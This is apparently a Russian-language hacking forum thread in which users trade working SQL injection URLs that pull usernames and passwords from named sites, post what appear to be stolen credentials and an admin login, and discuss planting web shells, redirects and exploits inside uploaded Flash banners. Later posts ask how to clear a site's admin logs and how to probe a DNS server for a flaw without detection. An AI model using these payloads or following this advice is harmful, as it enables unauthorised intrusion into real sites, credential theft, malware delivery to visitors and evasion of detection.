смотри вот этот эксплоит под мой вариант прокатит?
http://milw0rm.com/exploits/6304

http://www.site//out.asp?id=1+or+1=(SELECT+TOP+1+cast(username+as+n varchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+ from+x_ads_account)--
почему пишет, что неверное слово or, когда ДО этого, я спокойно его использовал при выводе таблиц? можно ли его заменить как-то?



Ann:1756543d9b768d870fab2000d9b667f8:new!pass#

Вопрос такой:
могу заливать и вешать баннеры на одном хосте.
проверки антивирем содержимого баннера нету, фильтрация по расширению не стоит (вроде как).
Директорию, куда пишутся файлы не получилось определить, и походу там есть несколько моих вебшеллов :-/

возможно ли записать в тело баннера код, который бы автоматичевки выполнялся при загрузке баннера?
что можно выжать максимально из возможности заливки и вывешивания баннеров (что-то вроде iframe, автоматической переадресации на "нужный сайт", запихнуть в него сплоит. или что нибудь в таком духе)

В вопросе по устройству и возможностях swf-файлов ничего не знаю, вот и задаю вопрос (-

Определи директорию банально. Просто "копировать адрес рисунка", после имя твоего файла допишешь и всё.

баннер это не картинка, a "Shockvawe Flash Object" :-\ анимашка.

захожу в дерикторию /banners/ и она пустая, файлов нет Х___х
нужны действующие способы (- репой закидаю (-

Если баннер заливается (и не в БД) и с любым расширением - то можешь просто в конец флешки записать шелл в хекс-редакторе. Если расширение полюбому SWF, то те нужно именно флешку заливать с определённым кодом (ЭкшенСкрипт) редиректа - это максимум

не прокатит, потому что это не эксплоит, а шеллкод

http://www.a-shop.ru/product_info.php?products_id=-1'+union+select+concat(username,char(58),password) +from+administrators/*

http://www.a-shop.ru/admin
sergey : q1w2e3
там есть менюшка с логами , вот как их отчистить?

Как можно безпалевно проверить днс сервер на эту http://www.securitylab.ru/vulnerability/355730.php дыру?